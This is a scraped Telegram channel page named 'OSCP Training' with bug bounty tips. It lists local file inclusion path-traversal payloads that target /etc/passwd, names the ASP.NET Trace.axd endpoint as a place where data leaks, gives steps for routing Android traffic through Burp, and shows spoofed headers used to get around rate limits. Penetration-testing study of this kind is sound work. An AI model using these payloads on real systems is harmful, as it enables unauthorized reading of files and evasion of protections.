πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
7.58K subscribers
75 photos
1 video
16 files
57 links
Offensive Security Certified Professional
@CEH_training
@WebHacking
@pfsense
@WifiHacking
πŸ”°For safer days
Download Telegram
Bug Bounty Tips

Sensitive Data Exposure
in ASPβ€’NET apps via /Trace.axd endpoint
Some filter bypass payload list while hunting for LFi vulnerability


β†’index.php?page=....//....//etc/passwd
β†’index.php?page=..///////..////..//////etc/passwd
β†’index.php?page=/var/www/../../etc/passwd
If you need to intercept the Android traffic through BurpSuite:
1)Ensure Burp is listening to more than the loopback address
2)Allow inbound traffic on the Firewall
3)Use ADB to run "settings put global http_proxy IP PORT"
4)Download and trust the CA from http://IP/cert
5)WIN
Forwarded from Web Hacking
Rate limit bypass using some custom headers:

X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP